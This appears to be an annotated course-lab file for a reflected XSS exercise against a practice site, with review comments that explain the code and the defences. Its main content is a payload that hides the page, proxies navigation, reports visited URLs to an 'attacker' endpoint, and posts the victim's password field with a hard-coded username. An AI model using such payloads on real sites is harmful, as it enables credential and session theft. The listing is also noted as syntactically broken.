<!-- Page scaffold for the exercise: a heading that the script later replaces
     with a link, a charset declaration, and the jQuery 2.0.3 library.
     NOTE(review): jQuery is fetched over plain http:// and without a
     Subresource Integrity attribute, so the library's content is not
     authenticated in transit. Prefer an https:// URL with integrity and
     crossorigin attributes. -->
- <h3>Hello</h3>
- <meta charset="utf-8">
- <script src="http://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>
- <script>
// Once the DOM is ready, build the demonstration URL with makeLink() and
// replace the <h3> contents with a "Try Bungle!" anchor that opens it in the
// window named "run".
// NOTE(review): the URL is placed into the href attribute by string
// concatenation and inserted with .html(). makeLink() percent-encodes only the
// `q` value, so `target` reaches the attribute unescaped. That is harmless
// while `target` is the constant defined in this file, but it would need
// attribute encoding if it ever came from input.
- $(document).ready(function() {
- var url = makeLink(xssdefense, target, attacker);
- $("h3").html("<a target=\"run\" href=\"" + url + "\">Try Bungle!</a>");
- });
- // Extend this function:
// Course-exercise skeleton: makeLink() serialises this function with
// toString() and places it in the `q` search parameter, so it only runs if
// the target page reflects `q` into its HTML without output encoding.
// Comments are kept outside the function body because toString() would
// otherwise carry them into the generated URL.
//
// What the body does, as written:
//   log(data)   - prints $.param(data) to the console and issues a GET to the
//                 `attacker` URL with `data` as the query string.
//   proxy(href) - loads `href` into the <html> element, reveals it, reports a
//                 {event: "nav", uri: href} record through log(), writes href
//                 into #query, and turns every .btn into a plain button whose
//                 click handler reads its `formaction` and loads that URL with
//                 a hard-coded username and the current #userpass value
//                 (jQuery's .load() sends an object argument as POST data).
//   The page is hidden first and proxy("./") is then called.
//
// NOTE(review): as pasted, this script block is not syntactically valid
// JavaScript, so the listing is a reading exercise rather than running code.
//
// Defender's view: the behaviour above depends on three things a site can
// control - reflected input that is not HTML-encoded, inline script being
// allowed to execute, and the page being free to make requests to arbitrary
// origins. Context-aware output encoding of `q` removes the first; a
// Content-Security-Policy without 'unsafe-inline' and with a restrictive
// connect-src limits the other two. In logs, this pattern shows up as an
// unusually long `q` value containing markup, and as cross-origin GETs
// carrying `event`/`uri` parameters.
- function payload(attacker) {
- function log(data) {
- console.log($.param(data))
- $.get(attacker, data);
- }
- function proxy(href) {
- $("html").load(href, function(){
- console.log("loaded nex page");
- $("html").show();
- log({event: "nav", uri: href});
- $("#query").val(href.toString());
- $(".btn").attr("type", "button");
- $(".btn").click(function(){
- var nextlink = $(this).attr("formaction");
- $("html").load(nextlink.toString(), { username:"quinn" password:$("#userpass").val()} )
- });
- });
- }
- $("html").hide();
- proxy("./");
- }
/**
 * Builds the demonstration URL for the selected defence level.
 *
 * Only level 0 is implemented. It returns `target` + "./search" with two
 * query parameters: `xssdefense` (the level) and `q`, whose value is a
 * percent-encoded script element containing the source text of payload()
 * followed by a call to it with `attacker` as the argument. The branches for
 * levels 1, 2 and any other value are empty, so the function returns
 * undefined for them.
 *
 * @param xssdefense defence level; compared loosely (==) against 0, 1 and 2.
 * @param target base URL of the site whose search page receives `q`.
 * @param attacker URL handed to payload() as its reporting endpoint.
 * @returns the URL string for level 0, otherwise undefined.
 *
 * NOTE(review): `attacker` is concatenated into a double-quoted string inside
 * the generated script without escaping, so a value containing a quote or
 * backslash would change that script's structure.
 * NOTE(review): the tag text is assembled as "<script" + ">" and
 * "</script" + ">", presumably so the literal closing tag never appears inside
 * this inline script element, where the HTML parser would end it early.
 *
 * For a defender, the takeaway is on the receiving side: the search page must
 * HTML-encode `q` before writing it into the response, because percent-decoding
 * hands the server the raw markup.
 */
- function makeLink(xssdefense, target, attacker) {
- if (xssdefense == 0) {
- return target + "./search?xssdefense=" + xssdefense.toString() + "&q=" +
- encodeURIComponent("<script" + ">" + payload.toString() +
- ";payload(\"" + attacker + "\");</script" + ">");
- } else if(xssdefense == 1){
- }else if (xssdefense == 2){
- }else{
- }
- }
// Exercise configuration read by the ready handler above.
// xssdefense: defence level passed to makeLink(); 0 is the only level with an
//             implemented branch.
// target:     base URL of the practice site; the host name suggests a course
//             lab server (presumably - confirm before pointing this anywhere).
// attacker:   reporting endpoint handed to payload(); here a loopback address,
//             so requests stay on the machine running the exercise.
- var xssdefense = 0;
- var target = "http://bungle-cs461.cs.illinois.edu/";
- var attacker = "http://127.0.0.1:31337/stolen";
- </script>
- 44()